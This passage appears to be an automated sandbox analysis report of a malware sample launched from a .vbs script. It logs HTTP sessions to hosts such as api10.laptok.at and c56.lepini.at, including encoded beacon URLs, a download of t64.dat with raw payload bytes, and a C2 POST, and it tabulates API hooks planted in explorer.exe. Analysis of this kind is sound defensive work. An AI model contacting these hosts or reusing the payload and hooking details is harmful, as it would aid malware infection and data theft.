Nov 23, 2020 12:19:14.887379885 CET	587	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Nov 2020 11:19:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9b 47 72 83 40 10 45 0f c4 82 20 e2 92 9c 73 66 07 22 83 c8 f9 f4 c6 3b 97 5c 25 31 33 dd fd df 1b d9 fd 0f 4d 67 52 5b 13 88 1d da dd fd 12 ea 33 3f 79 9f 7e 1c ee ec 64 f7 a8 b1 56 2e 58 e4 d2 b1 5e 6e 68 04 3b 6c 71 16 0d 81 a1 3b 93 88 82 cb db 3f 44 9f 0d 98 f7 cc 22 c9 c5 39 63 ee 7b 48 08 e1 2a 4c 92 42 e1 df cd aa 2d 10 b7 1b 79 0b 83 9f eb 86 dd af 2f 3e cc de 2f 40 8e 7e 6e 07 1a 67 a1 83 b4 2d 06 d9 11 69 00 cc c9 fb 44 fa 52 cd 08 fa 69 d2 f7 0f cc 0d 81 cf 53 c2 74 31 4f 0b a5 8f d9 e6 8a 7c 04 17 6f 0c 71 7e cf 1a 5e 90 fa b4 63 6e e3 29 47 ed e8 df 35 22 1e ae 6a 50 76 05 e3 95 4e c1 51 54 b3 31 33 be c4 87 36 5a 40 3c 29 e7 a1 f3 2a 5e 10 30 03 be f8 45 8f c7 40 8f 22 29 06 68 25 9c 49 aa 7f 09 57 4c ea af b3 3c ed a7 18 41 cb 0a bf a8 38 e7 64 e4 2b 1d 65 4a 26 95 d4 03 6f 03 7a cf a1 87 a2 f7 93 83 c3 10 22 04 8c 74 58 50 ce f0 d7 71 3c 19 d7 47 4e 0b 67 b3 bd f5 c8 6d b1 16 76 e8 96 da e1 87 41 77 fc 3c 71 8a fe 09 7a 93 48 81 65 f0 dc df af a2 10 9e 4e ee 1d 02 24 36 f8 d8 21 f5 40 9b 6e cc 22 94 c4 3f 94 51 19 34 09 33 d1 6c d8 6c ca 0f 1a de 13 a3 b4 26 30 26 43 0b 22 c8 5f b8 a9 cf 06 fc 02 1c a1 21 15 c8 e0 15 47 87 58 f9 d4 7c 1c 5e 64 20 0c e5 27 9b 31 7a af cb f4 1a 37 a4 ed d7 fc 21 e1 67 6b f0 a3 75 72 4c f1 d9 bc 02 e1 34 9a 3d 11 66 3d 8c 2b a1 79 a4 2b 2a 6b be 92 1b 74 86 20 9b bb 9d 8c 5a a9 d9 b2 97 69 5f 3f f0 13 9b ca 02 d4 e5 52 cf fc 7d a6 e4 10 85 e4 7c cc 8c ab 7e cc dd 08 99 90 25 1e fd 83 c5 7c 07 39 ee 47 56 b8 02 68 1b ce 3c e4 67 e5 54 b5 d9 97 ea 53 56 42 51 35 4a a8 ef fe c9 8f 82 95 67 a5 a9 b1 fb 3e 1b 09 0b 40 88 cc 79 f1 12 a1 40 cb cf 09 3e 1e 00 2d 65 e1 98 30 71 dc 33 2d 66 a7 3d 78 a5 62 81 1d 8f 30 b1 8e d1 53 d2 3e dd c5 7e 03 95 0e 7c 1e 4d 91 3d b7 c3 25 5e 2f 02 d3 74 e1 84 46 26 cd 07 c4 0b 57 be 6a c3 80 cb dc d7 ee 8e aa 91 0f f2 d1 67 2b a9 ce 25 41 9f b9 91 65 1f 83 6d 0b 84 8f 7c ea 22 ba 6e 81 56 50 b3 23 4c 4f 78 d7 33 f2 3b 72 5e c8 d7 3c 01 de df 5e 9f 5b 25 7c 4b c0 13 8d 87 40 5c 02 86 30 87 92 ca 92 0c ca 13 1e 95 86 9e 64 0f 01 10 0c ed 9c a1 e1 38 c2 d7 06 d8 3e ab a0 60 33 9e 90 b6 ef f3 fb 5e ae 88 c2 5b 41 a2 b4 bc 4f 1f 15 e3 34 2c 25 fe d8 4b 08 be e0 16 65 83 ff e1 db 69 74 82 e3 47 d9 ce b1 01 4a 5b 24 5a 35 79 f7 b3 79 5c 13 19 d2 74 1b 29 9e 6a 48 be 1f 3c ef 96 45 88 02 9e fd a0 dd 61 fa ee 5a 6d ce 27 68 65 ec 43 ad ae 69 7e 33 14 91 89 33 b5 52 7a 1f ce d3 10 00 18 91 92 de 1a 4d 71 64 8d 46 a1 42 a6 3b 8e c5 7e 90 0d 2e c2 5f 78 02 3b 5e e1 06 e6 5f 1c 25 49 cd 8a c2 f5 57 22 f5 06 e2 9f 58 db 21 9a ac 7a 7b 08 25 19 3f 11 f7 fe 00 44 c0 93 e3 84 b6 03 1a 18 10 7e fd b8 68 15 c8 41 09 c1 f5 3a 3e 35 0c 15 83 a6 f1 5f 21 49 a1 ba 09 19 7a b8 2a 91 88 db 1a 77 ad 54 4e 1b 35 dd 0f 08 3e c0 de 40 0f a3 4d 2b 86 87 f7 bb d4 cd c7 b5 a1 2b 6f c7 9f b6 71 31 71 7e 33 e1 fe d0 b0 6e bb a7 eb aa 42 a7 bb 19 da 99 20 3b a3 24 48 c7 12 d5 72 b7 70 27 f7 3c 1c 95 01 f6 f8 5d f9 22 00 95 88 17 59 3a a0 37 88 00 5a 41 9e 5c 27 37 82 33 39 57 39 dd d7 87 4e b6 d1 fe c1 93 ce be b9 28 93 a4 7e 9b 52 b7 c6 2e 74 03 33 49 db c4 c8 Data Ascii: 2000Gr@E sf";\%13MgR[3?y~dV.X^nh;lq;?D"9c{HLB-y/>/@~ng-iDRiSt1O\|oq~^cn)G5"jPvNQT136Z@<)^0E@")h%IWL<A8d+eJ&oz"tXPq<GNgmvAw<qzHeN$6!@n"?Q43ll&0&C"_!GX\|^d '1z7!gkurL4=f=+y+kt Zi_?R}\|~%\|9GVh<gTSVBQ5Jg>@y@>-e0q3-f=xb0S>~\|M=%^/tF&Wjg+%Aem\|"nVP#LOx3;r^<^[%\|K@\0d8>`3^[AO4,%KeitGJ[$Z5yy\t)jH<EaZm'heCi~33RzMqdFB;~._x;^_%IW"X!z{%?D~hA:>5_!IzwTN5>@M++oq1q~3nB ;$Hrp'<]"Y:7ZA\'739W9N(~R.t3I

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49737	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 23, 2020 12:19:16.872996092 CET	877	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: api10.laptok.at Connection: Keep-Alive
Nov 23, 2020 12:19:17.668709993 CET	883	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 23 Nov 2020 11:19:17 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49744	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 23, 2020 12:19:19.114414930 CET	898	OUT	GET /api1/KuF_2F7v1MfxGX_2FqHF/gE7HR_2BEW_2FETIZlo/3O7oOiSknl3ZdKUC6RNt6Z/TpA_2BZA44zII/bnPVc30i/qqGquE5ikDsN3lqsmRQUi6s/01UAcvdPS6/Y4vwKTH4z9SKX83Hk/GzPOGAYN_2Ba/uwZA847uRup/qUVRcsxtj_2B4M/Zg0BM4mqEN49EAfvZiK8m/hblONlnAdbx7_2FY/dksXSYXlnNujYzz/8J_2BxPtB78im5D1oF/b4ehtOJuT/4O2ZohnCHbAXcsKJP56g/k9_0A_0DMSUG1trlbpE/x9OMnUuruu3aGaoqe55RFv/8pmbW_2FjbM3S/_2FlfQQC/a7gxCYKdIB_2BmP/Gfdfp HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Nov 23, 2020 12:19:20.069576025 CET	913	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Nov 2020 11:19:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 37 33 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 95 35 b2 e4 50 10 04 0f 34 86 98 8c 35 c4 ac 27 26 4f cc 34 a2 91 4e bf ff 02 1d 51 d1 59 59 db 9c df 94 0d da 16 5c 51 df f7 60 91 29 98 08 a1 fa 95 b6 73 81 48 5f b3 07 f9 ac 79 2e ec 6c 5b 49 6e 82 38 ae 4f 67 af 4b 83 54 b6 9a 19 3e ac e8 bb c3 d1 1b 3b d9 29 6c 76 1a 2b 74 5a e1 2e 51 78 2b ac e6 dc b0 31 88 bc 06 2f 99 c1 d7 50 96 c6 22 af ff fc a1 8c 6b 21 3d 2b 71 cb 41 5b bd a2 3e fb 65 9d f4 a8 01 19 9a 70 bd 6c 9a 17 c7 8b ce d9 36 4b 76 8f a8 e2 50 1f 6e 55 8b fb a5 97 e2 39 96 2d cf 72 1b c2 ca 41 3d 82 95 34 27 ff e2 b5 6c c3 8b f6 08 78 c6 a1 fd db a7 b2 f6 bb f9 2d 6c 6a 38 5d 49 0f 5b ce 54 1b 07 61 6b f5 2f c6 c3 ac a1 b9 9b ae 35 6f 67 d0 a8 c4 4d 9c 53 09 86 62 08 c5 eb b3 20 68 80 62 d2 fb 80 23 d2 11 99 5b 81 5b 4f e1 88 a6 88 d7 ed 87 5a 16 02 bb 8e 06 45 09 2d fe 09 52 88 b6 52 45 5c 95 a7 c6 82 e1 d1 7a 85 57 f7 ae d5 3f 2b 67 43 9a 95 0a 05 3a 74 dd 97 86 ef a5 88 a7 4f b5 09 a7 cc ca e4 16 54 d9 60 32 cb de 2f 9f 01 51 b1 d8 ec a4 a6 1f 5c 4b 9e c6 59 35 c2 4b fd c7 e6 50 b2 ec fa 07 ea 0c a5 e5 c2 8f 4e 76 ba 40 d7 ab cd 47 4a 9b e3 15 67 09 16 98 61 5c c7 5f 63 b7 38 f5 e7 5e 90 b7 99 b8 e8 c5 d5 e0 1b 66 bc 6a 87 20 9e e2 1b 66 cd ec d5 db 70 a8 5d 68 ee e7 96 d1 5b c2 6a 60 4b f5 e6 d3 f0 30 44 02 09 4d e8 f3 5c 3d 36 12 0a af 68 54 b7 26 44 2a 00 c8 35 6c e4 c6 8f 66 96 b3 4a 05 65 34 d1 b7 28 a0 bb 5c e2 b1 93 3c 0a c1 f8 64 9b af 72 b6 28 f9 4d 46 ab 9f 33 a1 f9 9e 7f 28 79 41 de 64 c5 db 94 7a 70 a0 91 c2 69 ab d1 13 b6 07 59 4c 35 0c 59 c2 6e 9c 01 c6 30 28 79 62 ac dc 67 6f f6 8e 77 b8 1c 9a b5 ab 6f 51 18 76 d9 a1 4c c0 e8 e8 7c 70 be 8b 31 a2 ba ed e4 a2 d2 b1 33 29 3a 3f cc 2c 6d 4f e7 a5 86 e9 b1 2d 39 27 92 38 f2 11 15 0d 0f db e5 ea 96 ba 4b a8 a0 2b 63 89 a2 e8 d2 cc 42 d4 29 e0 d5 c0 2a 87 a4 a1 c7 35 f0 85 ea ad 17 84 83 58 5f 02 27 90 07 87 aa cc 3a e9 a4 98 14 7c ee 51 cc 6e 6c d3 18 b4 9b a3 3d b4 b8 bc 26 52 b5 4d e2 5e f8 cd 6d 1f 08 1f 0e c2 4e c8 0f 65 58 71 47 e5 70 ce 27 dd b6 ef 14 2f 32 7f 31 33 cd ab 9f 11 e3 2f 67 f3 82 33 63 61 3b 25 f8 f9 76 ee c2 f3 9d 25 ed ba bf 5b b9 1d c3 f1 91 c6 c1 f7 5b 8d 63 ca ea ef 9a ca 4a e9 2b c8 33 f6 1b b5 b3 33 91 6e a7 a2 87 4c 2b 14 9a d2 2c e0 51 b8 65 d2 6e fd 76 32 15 a0 6d 51 e7 3b e8 3a c7 99 f3 f9 09 fe 7e 9f 2c 6d 31 5f fc 1d 98 ac 15 a4 92 aa ea 3b 94 b6 3f bc c7 3c 15 ee f2 6b 7b 1d f6 79 4b 61 56 de a4 ee 94 e0 03 f2 a7 05 29 ef 2a d1 88 5a 04 a0 aa 51 3b c0 4b f9 ab 29 8e 77 99 11 72 1a 3a be 97 1c 10 b3 cb 9c 27 58 d0 3d 33 08 94 6a a2 8e 36 38 66 26 5d 0f 6a cc 50 04 c3 02 e9 41 2e f2 56 ee c9 83 c9 87 33 81 e5 a0 bf f2 6f fc 7d be c4 c9 21 9d 8c 19 50 a4 8d bd 47 a0 89 d2 8f ab af 94 cc 01 c1 78 79 39 53 f5 5b a8 0b 88 16 22 7d 10 21 ad e8 d6 87 51 16 dd f1 e4 8f 79 03 42 40 9e bb 85 c8 4f 80 81 0b b1 ff 2b 18 91 67 9b 72 ca a3 96 df b8 34 3e cd 01 13 c8 92 0a 93 7e 15 c2 c0 84 0a 83 cd 3a 31 6d d9 aa a7 27 7b 39 cf 05 12 c2 86 0b 0a 9d 6b 68 40 28 4f e8 c3 41 93 8e 81 4b 15 3b c3 9b 25 bb 8a b9 d1 0c a1 c5 ca 15 88 17 0e cf a5 35 d6 db 15 51 ce e3 9d 5e 1c 85 25 d7 6e 92 8e cc d4 0e dc 43 18 d5 Data Ascii: 73f5P45'&O4NQYY\Q`)sH_y.l[In8OgKT>;)lv+tZ.Qx+1/P"k!=+qA[>epl6KvPnU9-rA=4'lx-lj8]I[Tak/5ogMSb hb#[[OZE-RRE\zW?+gC:tOT`2/Q\KY5KPNv@GJga\_c8^fj fp]h[j`K0DM\=6hT&D5lfJe4(\<dr(MF3(yAdzpiYL5Yn0(ybgowoQvL\|p13):?,mO-9'8K+cB)5X_':\|Qnl=&RM^mNeXqGp'/213/g3ca;%v%[[cJ+33nL+,Qenv2mQ;:~,m1_;?<k{yKaV)*ZQ;K)wr:'X=3j68f&]jPA.V3o}!PGxy9S["}!QyB@O+gr4>~:1m'{9kh@(OAK;%5Q^%nC

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49765	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 23, 2020 12:20:00.069071054 CET	5675	OUT	GET /jvassets/xI/t64.dat HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: c56.lepini.at
Nov 23, 2020 12:20:00.715794086 CET	5677	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Nov 2020 11:20:00 GMT Content-Type: application/octet-stream Content-Length: 138820 Last-Modified: Mon, 28 Oct 2019 09:43:42 GMT Connection: close ETag: "5db6b84e-21e44" Accept-Ranges: bytes Data Raw: 17 45 7e 72 ac 5b ed 66 e1 de 31 9e 70 18 b7 1a 77 c0 be b3 e2 43 ff 7c d8 16 7f 6f 35 a2 d1 a5 d2 ec 0d 0c de 58 84 1a f3 53 04 f0 65 cb 76 1f 35 85 a0 7d 1d f2 44 63 de 89 f3 f1 eb d3 60 21 68 3d 3a 93 e1 55 94 db 4c d2 f2 b4 3e 34 48 eb e8 47 7b 53 14 54 86 87 a3 d2 0d 55 0c d0 4f 6f 51 73 eb e2 f9 f4 9b f0 49 af 3d a0 bd ba 48 52 29 a2 84 33 75 9e 48 16 a7 b3 00 58 91 bf bf ea 49 85 ff c7 58 36 df 5b 13 ec c2 c6 92 56 72 82 53 68 a1 ca a8 33 3e e7 8b 8e 6f fa 4b 85 a0 7f bb 5c de 12 c3 97 40 27 18 f2 b2 95 91 d8 b7 45 cf 2a 5f 95 76 5b fc 02 c1 9d d7 e5 7f ee ec f5 a0 52 7b 4d 4d ae da 70 b4 71 95 b6 39 2e 38 47 c0 ab 5e fe cf a1 6a 5c a5 3c 8f 1b 97 0a 2a 41 5f 6e 2e 85 b4 8e 24 d6 6a 1c cb 43 8c ca 75 7d 09 57 73 3c a2 b8 0b 18 00 21 c1 f5 fc e4 2b 04 14 51 c3 36 ea 80 55 0a 28 82 e4 56 51 91 99 bf 11 ae 36 06 cd 81 44 e0 ad db 69 d6 8e 24 28 ee 4c 0d 81 69 8b 96 c0 52 cd ed ec 31 e8 7f 08 d8 ff 0a 82 4d 1d fa a0 28 3c 3f 5f 53 cb 64 ea 5d 7c c7 f0 0f 28 71 5a f4 60 b7 7b f3 e1 19 5b 7b be d1 62 af ef 2f ad 3b 22 a8 03 e7 9f 3d e5 da ca 8b 1a 9c 2c fd 76 89 a9 f7 a5 7b 6a b4 47 62 bf 64 5d 54 26 01 9a 1d 3b b0 97 db c5 c1 dd 94 52 d0 b2 77 e0 f7 00 8d c1 99 02 69 f4 b2 87 b2 0c 68 b3 9d b6 e6 a6 9f 58 b0 52 f8 5e b5 ac 1e 36 41 bd bc f9 5d 3a 2b 5a 40 60 9a 48 c1 b3 4a df cc 81 65 53 4e e4 9a 80 8b dd 8f 43 eb 11 23 73 1b 1b c1 99 89 21 94 4c a5 84 c3 13 96 ad 5d 82 20 a4 a4 3b dd 1e 43 74 c6 42 11 7a 8a f2 93 8b 7e 24 73 17 d9 c7 eb 47 18 47 41 4f a2 f1 bc 52 cc 35 f2 c2 73 3e e5 32 8a b5 c7 7c 3b d4 88 bd aa 47 48 66 2e 00 bd 3f fc 08 b4 49 98 e3 36 db f0 33 4c 40 2b cc 59 2a b5 ba 73 58 27 de a0 31 0e 6d 63 70 19 7b 5f 67 00 54 79 89 7f 42 21 df 6e 23 e1 54 43 4a 09 00 77 ac fb e4 2e a8 6d 07 21 b3 a0 98 ad 40 d2 34 64 c9 c2 62 14 7c 45 eb a0 65 98 c1 18 a1 6a af 69 0a a2 bb 50 42 96 c1 d7 02 58 6d f4 b1 15 90 f6 50 9c 6a fd d4 2e 5e a7 4a cb 67 59 63 74 77 99 de e0 c0 d5 5c 9d a7 89 1b 90 39 29 23 21 3b c4 35 f1 49 9e 67 f3 ce fe 1d 0a 67 69 06 13 13 30 ab e6 c6 f4 c9 7e 94 48 5b a1 f7 5f 27 1f 03 ac 85 e1 0e b1 bf 6e e1 1c 5a 24 cc b2 53 fd 61 58 e3 87 0b 85 9e 03 94 f6 2a bd 92 53 09 77 f8 5e d3 c9 b7 19 42 4e e6 2a 67 af 27 4e 01 de 6a fc 1e 82 0c 7e 45 7b e8 1d 97 82 9b 5c 14 96 d2 82 dd 53 15 1e 84 41 01 4f 0f 32 ac ee b7 85 96 4c e9 dc b0 42 3c 93 a6 0b a3 79 cb 7b 2c d1 21 6f c1 6a 38 48 d7 37 8f 35 b8 1d 7a e7 eb 63 bc 4e 6b b6 23 aa 9c fd 32 03 46 e2 37 47 49 c2 35 a1 48 7e 98 49 6a b4 98 e7 cb 33 dd 1a be 5a c8 ea a7 44 33 9b e3 a6 84 da 68 ec bf 93 03 88 f9 6e 02 17 a6 96 46 ad ae 25 c2 bb 97 7a 57 35 aa 0a 42 b5 c3 8a 35 af 20 1b 1a b9 c6 99 99 8a b2 b6 46 1c 70 a0 53 c2 e9 a2 e6 ad a4 8f d5 11 da 74 60 13 7c 55 4d 42 1c c6 a4 47 a8 4e 27 67 a4 37 b3 0e ca f5 b1 9a a5 de e3 07 25 55 07 ff 18 b3 17 44 8b a0 af e3 f5 ff 75 b8 f2 2b 4d 9e f9 ad 07 c0 5e d7 1b ab 81 e4 99 93 ac a9 63 2f 4e 27 18 d0 dd 29 f7 28 98 b1 c3 5e 52 9e d4 01 1b 9f ba 6d 7d 24 b8 cc 84 0e 03 07 2e 3a ba b5 ad 8b ae 57 ce 78 7b aa 0f 07 5f ee 2a 4a 6b 0d f8 40 bb 79 91 71 5d ae 1b 1d 3c bf b9 e2 9b d4 4c 6c 52 55 e3 59 22 40 9a 6f cc 9a 14 bb 63 ad 00 8f bf cd 7b ca 18 ce c6 df 21 08 86 ed 93 17 79 b7 6d 89 0c ba 64 8a 93 dd fa 1b 07 69 84 31 87 f9 ae 59 a4 f8 ed 03 62 6f 2a fa 54 99 38 81 d4 e3 dc e8 39 d4 b0 62 81 c2 49 a1 Data Ascii: E~r[f1pwC\|o5XSev5}Dc`!h=:UL>4HG{STUOoQsI=HR)3uHXIX6[VrSh3>oK\@'E_v[R{MMpq9.8G^j\<A_n.$jCu}Ws<!+Q6U(VQ6Di$(LiR1M(<?_Sd]\|(qZ`{[{b/;"=,v{jGbd]T&;RwihXR^6A]:+Z@`HJeSNC#s!L] ;CtBz~$sGGAOR5s>2\|;GHf.?I63L@+YsX'1mcp{_gTyB!n#TCJw.m!@4db\|EejiPBXmPj.^JgYctw\9)#!;5Iggi0~H[_'nZ$SaXSw^BNg'Nj~E{\SAO2LB<y{,!oj8H75zcNk#2F7GI5H~Ij3ZD3hnF%zW5B5 FpSt`\|UMBGN'g7%UDu+M^c/N')(^Rm}$.:Wx{_Jk@yq]<LlRUY"@oc{!ymdi1Ybo*T89bI

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49766	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 23, 2020 12:20:13.752633095 CET	5823	OUT	GET /api1/IFYp0PHJ_2BMM/wnyhOVyw/DTs0YCcjJ3qF45s5mMb3gCK/4RNSmr4vxJ/t3onykIcbr_2FK9Xl/H4TzJ_2FhWjS/VeLVa7O7zLV/8TE8KNMU3WmVp7/1SZwuOnHWsYhkdJWGRZAO/qo7x2rkUbXkHUJ_2/BC7f_2BJ0A1Duj6/Ipk_2FJFklx32RY4N0/bk5DAm8jE/qW10iqV6xd9Zezvdl1zm/BnhClBi9RrNKwOk_2Bm/fx09VPfvVJosXa3PmEErZX/NEcSBwStFW8Y4/j9LX0_0A/_0DyR3w9VgUnyTwYjUOpcPC/rfYZc9XYZ8/Dq1kzhh1/E7PDPOgD/b HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 Host: api3.lepini.at
Nov 23, 2020 12:20:14.988385916 CET	5832	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Nov 2020 11:20:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.4	49768	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 23, 2020 12:20:15.327480078 CET	5833	OUT	POST /api1/v3jshWKSZC/krn1p7RrW8z3GbGc_/2FFaZK_2BekT/0OtUsmpYx6p/WfQzt4S0Zn457c/1i9HHJRZikaIvJ_2F4Ld0/npT_2Bob9NwfipWw/nUig82mch1FFwH2/1AhxrjhRqExAflhNHx/Cb9luck68/wJ0bPw_2BlEIUsEBoTa7/b3vKAY1TUvvWyKMIerF/bnMrh0BhKsVoIInhXNlnvd/gshefiHtEYuWl/JyEMRLpF/nO3AiIuXH9ihbmxg5VrB2D_/2B1gectVzg/fTJ8Ip_0A_0DE7j3s/GvjWVtZw3Zx0/xpwKnQogZJC/sFRvTTh1zHV/2QqrR8_2B/H HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 Content-Length: 2 Host: api3.lepini.at
Nov 23, 2020 12:20:16.533633947 CET	5833	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Nov 2020 11:20:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 38 33 0d 0a 88 00 b4 dc 2d aa 29 3c 22 33 bb 63 07 06 6c b7 f9 ec 96 ea ca d6 58 60 05 22 5c 39 58 81 fb 5f 35 c7 e1 71 09 b3 e5 13 18 a9 07 82 75 de 66 5e 1b 35 8b 82 b2 27 3e 11 ae 79 5e b4 b3 0d 67 10 f5 d0 ef 7a 45 e0 5b 51 d5 2f 26 df f8 6a 78 97 b4 c4 29 90 a6 66 f6 02 51 d8 cb 64 61 9f f7 12 29 b3 ac 50 96 8e fa 8f 20 01 fa 27 a1 fe 0e 85 09 65 f7 a0 f3 d5 78 6b d6 82 8d 1b 6e 1f 99 2f 23 e9 bc 0d 0a 30 0d 0a 0d 0a Data Ascii: 83-)<"3clX`"\9X_5quf^5'>y^gzE[Q/&jx)fQda)P 'exkn/#0

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	explorer.exe
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	explorer.exe
CreateProcessAsUserW	EAT	explorer.exe
CreateProcessAsUserW	INLINE	explorer.exe
CreateProcessW	EAT	explorer.exe
CreateProcessW	INLINE	explorer.exe
CreateProcessA	EAT	explorer.exe
CreateProcessA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFABB035200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	6855020

Process: explorer.exe, Module: KERNEL32.DLL

Function Name	Hook Type	New Data
CreateProcessAsUserW	EAT	7FFABB03521C
CreateProcessAsUserW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessW	EAT	7FFABB035200
CreateProcessW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessA	EAT	7FFABB03520E
CreateProcessA	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00

Process: explorer.exe, Module: WININET.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFABB035200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	6855020

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: wscript.exe PID: 4180 Parent PID: 3424

General

Start time:	12:18:39
Start date:	23/11/2020
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\2Q4tLHa5wbO1.vbs'
Imagebase:	0x7ff6defc0000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 7092 Parent PID: 800

General

Start time:	12:19:05
Start date:	23/11/2020
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff667450000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 4168 Parent PID: 7092

General

Start time:	12:19:06
Start date:	23/11/2020
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17410 /prefetch:2
Imagebase:	0x12a0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 6020 Parent PID: 7092

General

Start time:	12:19:11
Start date:	23/11/2020
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17418 /prefetch:2
Imagebase:	0x12a0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 6552 Parent PID: 7092

General

Start time:	12:19:17
Start date:	23/11/2020
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17424 /prefetch:2
Imagebase:	0x12a0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

